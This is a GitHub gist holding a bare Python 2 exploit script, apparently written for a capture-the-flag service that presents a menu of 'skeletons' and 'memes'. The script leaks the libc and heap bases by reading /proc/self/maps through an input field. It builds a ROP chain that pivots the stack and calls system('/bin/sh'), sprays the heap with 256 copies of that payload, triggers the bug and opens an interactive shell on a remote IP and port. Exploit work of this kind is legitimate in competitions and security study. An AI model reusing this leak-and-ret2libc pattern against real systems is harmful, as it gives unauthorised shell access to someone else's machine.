Skip to content

Instantly share code, notes, and snippets.

@peternguyen93
Created September 21, 2015 02:38
Show Gist options
  • Save peternguyen93/d9ffaa75eab24efeecc3 to your computer and use it in GitHub Desktop.
Save peternguyen93/d9ffaa75eab24efeecc3 to your computer and use it in GitHub Desktop.
#!/usr/bin/python
from Pwn import *
import re
def add_skeleton(skeleton):
d = p.read_until('\x1b[0;31;49m[q]\x1b[0muit')
p.write('m\n')
p.read_until('so... what do you say to mr skeletal?\n')
p.write(skeleton.encode('base64'))
r = p.read_until('im going to steal all ur calcuims')
if 'im going to steal all ur calcuims' in r:
return True
return False
def add_meme():
p.read_until('\x1b[0;31;49m[q]\x1b[0muit')
p.write('n\n')
def getBaseAddress():
pl = '/proc/self/maps'.encode('base64')
p.read_until('\x1b[0;31;49m[q]\x1b[0muit')
p.write('p\n')
p.read_until('ok, let me know your order number bro:')
p.write(pl)
leak = p.read_until('rint receipt from confirmation number')
match = re.findall(r'([0-9a-f]*\-[0-9a-f]*)',leak)
heap_base = int(match[10].split('-')[0],16)
libc_base = int(match[199].split('-')[0],16)
return libc_base,heap_base
# 0x00000000000b25d5 : add byte ptr [rcx], bh ; ror dword ptr [rdi], 1 ; xchg eax, esp ; ret
# 0x0000000000022b1a : pop rdi ; ret
# 0x000000000001f7a6 : pop rdi ; pop rbp ; ret
def exploit():
# start_offset = 0x10
global p
start = 233930608
p = Pwn(mode=1,host='52.3.190.202',port=1337)
# p = Pwn(mode=1,port=8888)
p.connect()
# raw_input('> ')
libc_base,heap_base = getBaseAddress()
print '[+] Libc base:',hex(libc_base)
print '[+] Heap base:',hex(heap_base)
# print '[!!!!] Offset',start
# addr = int(raw_input('> '),16)
pl = ''
pl+= pA([
libc_base + 0x1f7a6, # pop rdi ; pop rbp ; ret - skip me when stack is changed
libc_base + 0xb25d5, # add byte ptr [rcx], bh ; ror dword ptr [rdi], 1 ; xchg eax, esp ; ret
heap_base + start, # don't care
libc_base + 0x22b1a, # pop rdi ; ret
libc_base + 0x17ccdb, # "/bin/sh"
libc_base + 0x46640 # system
])
pl+='C'*(280 - len(pl))
add_meme()
for i in xrange(256):
print 'Add skeleton',(i+1)
if not add_skeleton(pl):
print 'Failed'
return 1
p.read_until('\x1b[0;31;49m[q]\x1b[0muit')
p.write('c\n') # trigger bug
p.io()
# start_offset+=280
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment